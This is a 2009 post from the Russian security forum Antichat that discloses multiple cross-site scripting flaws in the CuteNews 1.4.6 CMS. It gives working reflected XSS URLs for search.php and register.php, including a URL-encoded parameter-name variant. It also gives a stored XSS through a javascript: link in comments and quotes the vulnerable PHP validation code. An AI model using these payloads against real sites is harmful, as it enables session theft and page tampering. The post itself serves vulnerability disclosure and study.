ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
   
 
 
Опции темы Поиск в этой теме Опции просмотра

CuteNews 1.4.6 / Множественные XSS
  #1  
Старый 21.08.2009, 22:24
Аватар для Grey
Grey
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503

Репутация: 5826


По умолчанию CuteNews 1.4.6 / Множественные XSS

CuteNews 1.4.6 / Множественные XSS

1. Пассивные XSS:

Во всех формах в action указывается $PHP_SELF, что делает скрипт уязвимым:

Код:
http://test1.ru/cutenews/search.php/1"><script>alert();</script>
http://test1.ru/cutenews/register.php/"><script>alert();</script>/?action=lostpass
ну и т.д.

Далее в файле /search.php наблюдаем следующий код:

PHP код:
//check for bad _GET and _POST
if($dosearch == "yes"){
  
$check_params array_merge($_GET$_POST);
  foreach(
$check_params as $param_key=>$param_val){
    if( !empty(
$param_val) && !preg_match('/^[a-zA-Z0-9\- ]{0,255}$/'$param_val) ){
      die(
"Error! the parameter '$param_key' contains illigal characters");
    }
  }

а именно строчку: die("Error! the parameter '$param_key' contains illigal characters");

<script>alert();</script> ---> %3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%29%3B%3 C%2F%73%63%72%69%70%74%3E

Код:
http://test1.ru/cutenews/search.php?dosearch=yes&%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%29%3B%3C%2F%73%63%72%69%70%74%3E=.
2. Активная XSS:

В комментах пишем:

[link=javascript:alert()]text[/link]

P.S. двиг изобилует кривизной кода.

© Grey

Последний раз редактировалось Grey; 26.08.2009 в 11:19..
 
Ответить с цитированием
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ